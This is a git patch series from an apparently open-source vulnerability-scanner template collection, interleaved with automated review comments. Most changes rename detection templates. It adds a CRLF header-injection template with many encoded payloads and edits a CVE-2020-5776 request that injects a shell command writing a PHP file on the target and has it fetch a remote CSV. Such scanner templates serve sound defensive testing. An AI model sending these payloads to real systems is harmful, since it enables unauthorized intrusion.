other}/couchdb-adminparty.yaml (100%) rename vulnerabilities/{ => other}/discourse-xss.yaml (100%) rename vulnerabilities/{ => other}/mcafee-epo-rce.yaml (100%) rename vulnerabilities/{ => other}/microstrategy-ssrf.yaml (100%) rename vulnerabilities/{ => other}/mida-eframework-xss.yaml (100%) rename vulnerabilities/{ => other}/nginx-module-vts-xss.yaml (100%) rename vulnerabilities/{ => other}/nuuo-nvrmini2-rce.yaml (100%) rename vulnerabilities/{ => other}/pdf-signer-ssti-to-rce.yaml (100%) rename vulnerabilities/{ => other}/rce-shellshock-user-agent.yaml (100%) rename vulnerabilities/{ => other}/rce-via-java-deserialization.yaml (100%) rename vulnerabilities/{ => other}/rconfig-rce.yaml (100%) rename vulnerabilities/{ => other}/sick-beard-xss.yaml (100%) rename vulnerabilities/{ => other}/symantec-messaging-gateway.yaml (100%) rename vulnerabilities/{ => other}/tikiwiki-reflected-xss.yaml (100%) rename vulnerabilities/{ => other}/twig-php-ssti.yaml (100%) rename vulnerabilities/{ => other}/vpms-auth-bypass.yaml (100%) rename vulnerabilities/{ => other}/wems-manager-xss.yaml (100%) rename vulnerabilities/{ => other}/zms-auth-bypass.yaml (100%) rename vulnerabilities/{ => wordpress}/sassy-social-share.yaml (100%) diff --git a/vulnerabilities/tomcat-manager-pathnormalization.yaml b/exposed-panels/tomcat-manager-pathnormalization.yaml similarity index 100% rename from vulnerabilities/tomcat-manager-pathnormalization.yaml rename to exposed-panels/tomcat-manager-pathnormalization.yaml diff --git a/exposed-files/apis/swagger-panel.yaml b/exposures/apis/swagger-api.yaml similarity index 98% rename from exposed-files/apis/swagger-panel.yaml rename to exposures/apis/swagger-api.yaml index 89c137c8b4..b02f519310 100644 --- a/exposed-files/apis/swagger-panel.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,4 +1,4 @@ -id: swagger-panel +id: swagger-apis info: name: Swagger API Panel 
diff --git a/exposed-files/apis/wadl-files.yaml b/exposures/apis/wadl-api.yaml similarity index 98% rename from exposed-files/apis/wadl-files.yaml rename to exposures/apis/wadl-api.yaml index 090d4d8819..83f800b6e1 100644 --- a/exposed-files/apis/wadl-files.yaml +++ b/exposures/apis/wadl-api.yaml @@ -1,4 +1,4 @@ -id: wadl-files +id: wadl-api info: name: wadl file disclosure diff --git a/exposed-files/apis/wsdl-detect.yaml b/exposures/apis/wsdl-api.yaml similarity index 89% rename from exposed-files/apis/wsdl-detect.yaml rename to exposures/apis/wsdl-api.yaml index 4b57f87f03..44d7f7b49a 100644 --- a/exposed-files/apis/wsdl-detect.yaml +++ b/exposures/apis/wsdl-api.yaml @@ -1,4 +1,4 @@ -id: wsdl-detect +id: wsdl-api info: name: wsdl-detect diff --git a/exposed-files/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml similarity index 100% rename from exposed-files/backups/sql-dump.yaml rename to exposures/backups/sql-dump.yaml diff --git a/exposed-files/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml similarity index 100% rename from exposed-files/backups/zip-backup-files.yaml rename to exposures/backups/zip-backup-files.yaml diff --git a/exposed-files/configs/composer-config.yaml b/exposures/configs/composer-config.yaml similarity index 100% rename from exposed-files/configs/composer-config.yaml rename to exposures/configs/composer-config.yaml diff --git a/exposed-files/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml similarity index 100% rename from exposed-files/configs/exposed-svn.yaml rename to exposures/configs/exposed-svn.yaml diff --git a/exposed-files/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml similarity index 100% rename from exposed-files/configs/git-config-nginxoffbyslash.yaml rename to exposures/configs/git-config-nginxoffbyslash.yaml 
diff --git a/exposed-files/configs/git-config.yaml b/exposures/configs/git-config.yaml
similarity index 100%
rename from exposed-files/configs/git-config.yaml
rename to exposures/configs/git-config.yaml
diff --git a/exposed-files/htpasswd-detection.yaml b/exposures/configs/htpasswd-detection.yaml
similarity index 100%
rename from exposed-files/htpasswd-detection.yaml
rename to exposures/configs/htpasswd-detection.yaml
diff --git a/exposed-files/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml
similarity index 100%
rename from exposed-files/configs/laravel-env.yaml
rename to exposures/configs/laravel-env.yaml
diff --git a/exposed-files/configs/magento-config.yaml b/exposures/configs/magento-config.yaml
similarity index 100%
rename from exposed-files/configs/magento-config.yaml
rename to exposures/configs/magento-config.yaml
diff --git a/exposed-files/configs/owncloud-config.yaml b/exposures/configs/owncloud-config.yaml
similarity index 100%
rename from exposed-files/configs/owncloud-config.yaml
rename to exposures/configs/owncloud-config.yaml
diff --git a/exposed-files/configs/package-json.yaml b/exposures/configs/package-json.yaml
similarity index 100%
rename from exposed-files/configs/package-json.yaml
rename to exposures/configs/package-json.yaml
diff --git a/exposed-files/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
similarity index 100%
rename from exposed-files/configs/phpinfo.yaml
rename to exposures/configs/phpinfo.yaml
diff --git a/exposed-files/configs/redmine-db-config.yaml b/exposures/configs/redmine-db-config.yaml
similarity index 100%
rename from exposed-files/configs/redmine-db-config.yaml
rename to exposures/configs/redmine-db-config.yaml
diff --git a/exposed-files/server-status-localhost.yaml b/exposures/configs/server-status-localhost.yaml
similarity index 100%
rename from exposed-files/server-status-localhost.yaml
rename to exposures/configs/server-status-localhost.yaml
diff --git a/exposed-files/syfmony-profiler.yaml b/exposures/configs/syfmony-profiler.yaml
similarity index 100%
rename from exposed-files/syfmony-profiler.yaml
rename to exposures/configs/syfmony-profiler.yaml
diff --git a/exposed-files/configs/web-config.yaml b/exposures/configs/web-config.yaml
similarity index 100%
rename from exposed-files/configs/web-config.yaml
rename to exposures/configs/web-config.yaml
diff --git a/exposed-files/domcfg-page.yaml b/exposures/files/domcfg-page.yaml
similarity index 100%
rename from exposed-files/domcfg-page.yaml
rename to exposures/files/domcfg-page.yaml
diff --git a/exposed-files/drupal-install.yaml b/exposures/files/drupal-install.yaml
similarity index 100%
rename from exposed-files/drupal-install.yaml
rename to exposures/files/drupal-install.yaml
diff --git a/exposed-files/ds_store.yaml b/exposures/files/ds_store.yaml
similarity index 100%
rename from exposed-files/ds_store.yaml
rename to exposures/files/ds_store.yaml
diff --git a/exposed-files/filezilla.yaml b/exposures/files/filezilla.yaml
similarity index 100%
rename from exposed-files/filezilla.yaml
rename to exposures/files/filezilla.yaml
diff --git a/exposed-files/lazy-file.yaml b/exposures/files/lazy-file.yaml
similarity index 100%
rename from exposed-files/lazy-file.yaml
rename to exposures/files/lazy-file.yaml
diff --git a/exposed-files/server-private-keys.yaml b/exposures/files/server-private-keys.yaml
similarity index 100%
rename from exposed-files/server-private-keys.yaml
rename to exposures/files/server-private-keys.yaml
diff --git a/exposed-files/xprober-service.yaml b/exposures/files/xprober-service.yaml
similarity index 100%
rename from exposed-files/xprober-service.yaml
rename to exposures/files/xprober-service.yaml
diff --git a/exposed-files/logs/elmah-log-file.yaml b/exposures/logs/elmah-log-file.yaml
similarity index 100%
rename from exposed-files/logs/elmah-log-file.yaml
rename to exposures/logs/elmah-log-file.yaml
diff --git a/exposed-files/logs/error-logs.yaml b/exposures/logs/error-logs.yaml similarity index 100% rename from exposed-files/logs/error-logs.yaml rename to exposures/logs/error-logs.yaml diff --git a/exposed-files/trace-axd-detect.yaml b/exposures/logs/trace-axd-detect.yaml similarity index 100% rename from exposed-files/trace-axd-detect.yaml rename to exposures/logs/trace-axd-detect.yaml diff --git a/takeovers/s3-subtakeover.yaml b/misconfiguration/aws-redirect.yaml similarity index 80% rename from takeovers/s3-subtakeover.yaml rename to misconfiguration/aws-redirect.yaml index 66eced0530..911ca6a4dd 100644 --- a/takeovers/s3-subtakeover.yaml +++ b/misconfiguration/aws-redirect.yaml @@ -1,12 +1,10 @@ -id: s3-subtakeover +id: aws-redirect info: name: Subdomain takeover AWS S3 author: manikanta a.k.a @secureitmania - severity: high - - # Source:- https://link.medium.com/fgXKJHR9P7 - + severity: info + reference: https://link.medium.com/fgXKJHR9P7 requests: - method: GET diff --git a/exposed-files/docker-registry.yaml b/misconfiguration/docker-registry.yaml similarity index 100% rename from exposed-files/docker-registry.yaml rename to misconfiguration/docker-registry.yaml diff --git a/misconfiguration/larvel-debug.yaml b/misconfiguration/larvel-debug.yaml index 9ce2451224..2235ef16af 100644 --- a/misconfiguration/larvel-debug.yaml +++ b/misconfiguration/larvel-debug.yaml @@ -9,8 +9,6 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}:8081" - - "{{BaseURL}}:9001" matchers-condition: and matchers: diff --git a/vulnerabilities/symfony-debugmode.yaml b/misconfiguration/symfony-debugmode.yaml similarity index 100% rename from vulnerabilities/symfony-debugmode.yaml rename to misconfiguration/symfony-debugmode.yaml diff --git a/takeovers/detect-all-takeovers.yaml b/takeovers/subdomain-takeover.yaml similarity index 100% rename from takeovers/detect-all-takeovers.yaml rename to takeovers/subdomain-takeover.yaml 
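Review bot: In the aws-redirect hunk, `name: Subdomain takeover AWS S3` is left unchanged while the id becomes `aws-redirect` and the severity drops from `high` to `info`, so the template's name still claims a takeover that its new id and severity no longer assert; rename it to match, e.g. `name: AWS S3 Bucket Redirect`. The matchers are outside the hunk, so it cannot be confirmed here whether the logic still tests for a takeover condition; if it does, the severity downgrade is the part to revisit instead of the name.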
diff --git a/exposed-files/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml similarity index 100% rename from exposed-files/graylog-api-browser.yaml rename to technologies/graylog-api-browser.yaml diff --git a/exposed-files/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml similarity index 100% rename from exposed-files/telerik-dialoghandler-detect.yaml rename to technologies/telerik-dialoghandler-detect.yaml diff --git a/exposed-files/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml similarity index 100% rename from exposed-files/telerik-fileupload-detect.yaml rename to technologies/telerik-fileupload-detect.yaml diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml new file mode 100644 index 0000000000..bdb6cd7889 --- /dev/null +++ b/vulnerabilities/generic/crlf-injection.yaml 
@@ -0,0 +1,25 @@ +id: crlf-injection + +info: + name: CRLF injection + author: melbadry9 & nadino & xElkomy + severity: low + description: Improper sanitization of CRLF sequences. + +requests: + - method: GET + path: + - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass + - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" + - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache + - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 + - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlf
injection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0
D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + + matchers: + - type: regex + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + part: header diff --git a/vulnerabilities/generic/top-15-xss.yaml b/vulnerabilities/generic/top-xss-params.yaml similarity index 98% rename from vulnerabilities/generic/top-15-xss.yaml rename to vulnerabilities/generic/top-xss-params.yaml index 49e6907b0a..88cea7c922 100644 --- a/vulnerabilities/generic/top-15-xss.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -1,5 +1,5 @@ # id contains the unique identifier for the template. -id: top-15-xss +id: top-xss-params info: # Name is the name of the template diff --git a/vulnerabilities/crlf-injection.yaml b/vulnerabilities/generic/url-redirect.yaml similarity index 100% rename from vulnerabilities/crlf-injection.yaml rename to vulnerabilities/generic/url-redirect.yaml diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/ibm/eclipse-help-system-xss.yaml similarity index 100% rename from vulnerabilities/eclipse-help-system-xss.yaml rename to vulnerabilities/ibm/eclipse-help-system-xss.yaml diff --git a/vulnerabilities/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml similarity index 100% rename from vulnerabilities/ibm-infoprint-directory-traversal.yaml rename to vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml diff --git a/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml b/vulnerabilities/other/bullwark-momentum-series-directory-traversal.yaml similarity index 100% rename from vulnerabilities/bullwark-momentum-series-directory-traversal.yaml rename to vulnerabilities/other/bullwark-momentum-series-directory-traversal.yaml 
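Review bot: Two of the new request paths in `crlf-injection.yaml` can never satisfy the regex matcher: `/%0ASet-Cookie%3Acrlfinjection/..` (`# Apache`) and `/~user/%0D%0ASet-Cookie:crlfinjection` (`# CVE-2016-4975`) inject a cookie named `crlfinjection` with no value, but the regex requires the literal `crlfinjection=crlfinjection`, so a vulnerable response to either variant is silently dropped. Append `=crlfinjection` to both payloads; for the `/..` variant the terminator `(?:$|;)` would then also need relaxing (or `/..` placed before the injected header), since a value followed by `/..` is still rejected. The long multi-parameter path also contains `&redirectUri&redirectUrl=`, i.e. `redirectUri` is sent without a payload, which looks like a dropped `=%0D%0ASet-Cookie:crlfinjection=crlfinjection`. The inline `# unicode bypass`, `# Apache` and `# CVE-2016-4975` comments are useful; extending `description` with a sentence that the matcher inspects only response headers (`part: header`), so body reflections are intentionally not reported, would make the template's scope clear to a reader.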
diff --git a/vulnerabilities/cached-aem-pages.yaml b/vulnerabilities/other/cached-aem-pages.yaml
similarity index 100%
rename from vulnerabilities/cached-aem-pages.yaml
rename to vulnerabilities/other/cached-aem-pages.yaml
diff --git a/vulnerabilities/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml
similarity index 100%
rename from vulnerabilities/couchdb-adminparty.yaml
rename to vulnerabilities/other/couchdb-adminparty.yaml
diff --git a/vulnerabilities/discourse-xss.yaml b/vulnerabilities/other/discourse-xss.yaml
similarity index 100%
rename from vulnerabilities/discourse-xss.yaml
rename to vulnerabilities/other/discourse-xss.yaml
diff --git a/vulnerabilities/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml
similarity index 100%
rename from vulnerabilities/mcafee-epo-rce.yaml
rename to vulnerabilities/other/mcafee-epo-rce.yaml
diff --git a/vulnerabilities/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml
similarity index 100%
rename from vulnerabilities/microstrategy-ssrf.yaml
rename to vulnerabilities/other/microstrategy-ssrf.yaml
diff --git a/vulnerabilities/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml
similarity index 100%
rename from vulnerabilities/mida-eframework-xss.yaml
rename to vulnerabilities/other/mida-eframework-xss.yaml
diff --git a/vulnerabilities/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml
similarity index 100%
rename from vulnerabilities/nginx-module-vts-xss.yaml
rename to vulnerabilities/other/nginx-module-vts-xss.yaml
diff --git a/vulnerabilities/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
similarity index 100%
rename from vulnerabilities/nuuo-nvrmini2-rce.yaml
rename to vulnerabilities/other/nuuo-nvrmini2-rce.yaml
diff --git a/vulnerabilities/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
similarity index 100%
rename from vulnerabilities/pdf-signer-ssti-to-rce.yaml
rename to vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
diff --git a/vulnerabilities/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml
similarity index 100%
rename from vulnerabilities/rce-shellshock-user-agent.yaml
rename to vulnerabilities/other/rce-shellshock-user-agent.yaml
diff --git a/vulnerabilities/rce-via-java-deserialization.yaml b/vulnerabilities/other/rce-via-java-deserialization.yaml
similarity index 100%
rename from vulnerabilities/rce-via-java-deserialization.yaml
rename to vulnerabilities/other/rce-via-java-deserialization.yaml
diff --git a/vulnerabilities/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
similarity index 100%
rename from vulnerabilities/rconfig-rce.yaml
rename to vulnerabilities/other/rconfig-rce.yaml
diff --git a/vulnerabilities/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml
similarity index 100%
rename from vulnerabilities/sick-beard-xss.yaml
rename to vulnerabilities/other/sick-beard-xss.yaml
diff --git a/vulnerabilities/symantec-messaging-gateway.yaml b/vulnerabilities/other/symantec-messaging-gateway.yaml
similarity index 100%
rename from vulnerabilities/symantec-messaging-gateway.yaml
rename to vulnerabilities/other/symantec-messaging-gateway.yaml
diff --git a/vulnerabilities/tikiwiki-reflected-xss.yaml b/vulnerabilities/other/tikiwiki-reflected-xss.yaml
similarity index 100%
rename from vulnerabilities/tikiwiki-reflected-xss.yaml
rename to vulnerabilities/other/tikiwiki-reflected-xss.yaml
diff --git a/vulnerabilities/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml
similarity index 100%
rename from vulnerabilities/twig-php-ssti.yaml
rename to vulnerabilities/other/twig-php-ssti.yaml
diff --git a/vulnerabilities/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
similarity index 100%
rename from vulnerabilities/vpms-auth-bypass.yaml
rename to vulnerabilities/other/vpms-auth-bypass.yaml
diff --git a/vulnerabilities/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml
similarity index 100%
rename from vulnerabilities/wems-manager-xss.yaml
rename to vulnerabilities/other/wems-manager-xss.yaml
diff --git a/vulnerabilities/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
similarity index 100%
rename from vulnerabilities/zms-auth-bypass.yaml
rename to vulnerabilities/other/zms-auth-bypass.yaml
diff --git a/vulnerabilities/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml
similarity index 100%
rename from vulnerabilities/sassy-social-share.yaml
rename to vulnerabilities/wordpress/sassy-social-share.yaml
From eaaf56e9da7ffee4a2122ecb020057f0e4fa300b Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 18:58:57 +0530
Subject: [PATCH 25/85] workflow updates
---
 .nuclei-ignore | 4 ++--
 cves/2020/CVE-2020-5776.yaml | 2 +-
 cves/2020/CVE-2020-6287.yaml | 2 +-
 {technologies => exposed-panels}/jira-detect.yaml | 0
 fuzzing/basic-auth-bruteforce.yaml | 2 +-
 fuzzing/wp-plugin-scan.yaml | 2 +-
 workflows/cisco-asa-workflow.yaml | 2 +-
 workflows/grafana-workflow.yaml | 4 ++--
 workflows/jira-workflow.yaml | 8 ++------
 workflows/mida-eframework-workflow.yaml | 2 +-
 workflows/rabbitmq-workflow.yaml | 4 ++--
 workflows/solarwinds-orion-workflow.yaml | 4 ++--
 workflows/springboot-workflow.yaml | 3 +-
 workflows/wordpress-workflow.yaml | 15 +--------------
 14 files changed, 18 insertions(+), 36 deletions(-)
 rename {technologies => exposed-panels}/jira-detect.yaml (100%)
diff --git a/.nuclei-ignore b/.nuclei-ignore
index f565648fa6..2de13a9905 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml fuzzing/ # Wordlist directory contains payload to be used with templates. -wordlists/ -misc/ +helpers/ +miscellaneous/ # Workflows are excluded from default run to avoid duplicate scans. workflows/ \ No newline at end of file diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 5a04ba81be..0c7e24a866 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -20,7 +20,7 @@ requests: Content-type: application/x-www-form-urlencoded Connection: close - profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= + profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= - | POST /magmi/web/magmi_run.php HTTP/1.1 Host: {{Hostname}} 
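Review bot: The comment `# Wordlist directory contains payload to be used with templates.` in `.nuclei-ignore` now sits above `helpers/` and `miscellaneous/` and no longer describes the second entry; `miscellaneous/` holds templates (the README tree in the following auto-update patch lists `basic-cors-flash.yaml`, `dir-listing.yaml` and others under it), not wordlists. Replace it with `# helpers/ holds payloads and wordlists used by templates; miscellaneous/ templates are excluded from the default run.` so the reason each directory is ignored is stated next to it.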
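Review bot: The `CSV%3Aremoteurl` value in `CVE-2020-5776.yaml` still points the scanned host at `raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/helpers/payloads/CVE-2020-5776.csv`, a mutable branch path: this very commit had to edit it because the file moved, and any future rename breaks the check while the scan simply reports nothing. It also means the template only works when the target can reach GitHub, and that whatever is on `master` at that path at scan time is what the target imports. Pinning to a commit, e.g. `.../nuclei-templates/<commit-sha>/helpers/payloads/CVE-2020-5776.csv`, removes the dependence on branch state; `CVE-2020-6287.yaml` in the same commit uses a local `data: helpers/payloads/CVE-2020-6287.xml` reference instead, which is the more robust pattern wherever a remote fetch is not inherent to the check. A comment above the raw block such as `# requires outbound HTTPS from the target to raw.githubusercontent.com` would help anyone running this behind an egress filter. The raw request block continues outside the hunk.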
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index f99943bae8..b0d8716cb7 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -17,7 +17,7 @@ info: requests: - payloads: - data: "payloads/CVE-2020-6287.xml" + data: helpers/payloads/CVE-2020-6287.xml raw: - | POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 diff --git a/technologies/jira-detect.yaml b/exposed-panels/jira-detect.yaml similarity index 100% rename from technologies/jira-detect.yaml rename to exposed-panels/jira-detect.yaml diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml index bd812df538..3ec202210b 100644 --- a/fuzzing/basic-auth-bruteforce.yaml +++ b/fuzzing/basic-auth-bruteforce.yaml @@ -2,7 +2,7 @@ id: basic-auth-bruteforce info: name: Basic Auth Bruteforce - author: "@w4cky_" + author: w4cky_ severity: high # Impotent Notes:- diff --git a/fuzzing/wp-plugin-scan.yaml b/fuzzing/wp-plugin-scan.yaml index 68e783a268..26e06c7894 100644 --- a/fuzzing/wp-plugin-scan.yaml +++ b/fuzzing/wp-plugin-scan.yaml @@ -8,7 +8,7 @@ info: requests: - payloads: - plugin_wordlist: wordlists/wp-plugins.txt + plugin_wordlist: helpers/wordlists/wp-plugins.txt # Thanks to RandomRobbieBF for the wordlist # https://github.com/RandomRobbieBF/wordpress-plugin-list diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index f7b4996622..00c8369277 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: panels/cisco-asa-panel.yaml + - template: exposed-panels/cisco-asa-panel.yaml subtemplates: - template: cves/2020/CVE-2020-3187.yaml diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index cc1c9b28f2..92d69b997f 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml 
